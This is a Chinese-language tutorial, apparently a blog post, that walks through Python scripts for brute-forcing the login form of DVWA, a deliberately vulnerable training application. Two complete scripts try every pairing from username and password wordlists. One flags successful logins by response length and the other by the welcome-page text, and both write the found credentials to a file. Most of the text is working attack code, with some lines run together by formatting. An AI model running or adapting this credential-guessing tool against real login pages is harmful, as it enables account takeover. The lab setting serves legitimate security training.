測試靶機為DVWA,適合DVWA暴力破解模塊得Low和Medium等級。
關(guān)鍵代碼解釋url指定url地址
url = "192.168.171.2/dvwa/vulnerabilities/brute/"
header設(shè)置請求頭
header = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 'cookie':'security=medium; PHPSESS=geo7gb3ehf5gfnbhrvuqu545i7'}
payload設(shè)置請求參數(shù)
payload = {'username':username,'password':password,"Login":'Login'}
這一行得作用是作一次get請求,響應(yīng)信息被變量Response接收。
Response = requests.get(url,params=payload,headers=header)
這兩行代碼循環(huán)遍歷賬號和密碼字典文件,之后給他們做笛卡爾積循環(huán)暴力破解
這種方式和burp得Intruder模塊得Cluster bomb攻擊方式一樣。
for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"): for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"):
然后把循環(huán)結(jié)果存放到csv文件里,用逗號分割數(shù)據(jù)
Response.status_code是響應(yīng)得http狀態(tài)碼,len(Response.content)是http響應(yīng)報文得長度。
result = str(Response.status_code) + ',' + username + ','\ + password + ',' + str(len(Response.content))f.write(result + '\n')完整代碼方法一
登陸成功得和失敗返回數(shù)據(jù)不同,所以數(shù)據(jù)包長度也不同。包長度與其他不同得數(shù)據(jù),可能就是正確得賬號密碼。
import requestsurl = "192.168.171.2/dvwa/vulnerabilities/brute/"#proxies= {"http":"127.0.0.1:8080"} #代理設(shè)置,方便burp抓包查看header = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 'cookie':'security=medium; PHPSESS=bdi0ak5mqbud69nrnejgf8q00u'}f = open('result.csv','w')f.write('狀態(tài)碼' + ',' + '用戶名' + ',' + '密碼' + ',' + '包長度' + '\n')for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"): for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"): username = admin.strip() password = line.strip() payload = {'username':username,'password':password,"Login":'Login'} Response = requests.get(url,params=payload,headers=header) result = str(Response.status_code) + ',' + username + ','\ + password + ',' + str(len(Response.content)) f.write(result + '\n')print('\n完成')運行
這就是腳本發(fā)送得數(shù)據(jù)包
查看結(jié)果
查看包長度與其他不同得數(shù)據(jù),登錄測試
方法二這個方法是根據(jù)登陸成功得返回特征來判斷是否為正確得賬號密碼,然后把正確得賬號密碼輸出到屏幕和txt文件里。
主要改動在第17到20行
import requestsurl = "192.168.171.2/dvwa/vulnerabilities/brute/"#proxies= {"http":"127.0.0.1:8080"} #代理設(shè)置,方便burp抓包查看header = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 'cookie':'security=medium; PHPSESS=bdi0ak5mqbud69nrnejgf8q00u'}f = open('result.txt','w')for admin in open("C:\\Users\\admin\\documents\\字典\\賬號.txt"): for line in open("C:\\Users\\admin\\documents\\字典\\密碼.txt"): username = admin.strip() password = line.strip() payload = {'username':username,'password':password,"Login":'Login'} Response = requests.get(url,params=payload,headers=header) if not(Response.text.find('Welcome to the password protected area')==-1): result = username + ':' + password print(result) f.write(result + '\n') print('\n完成')運行
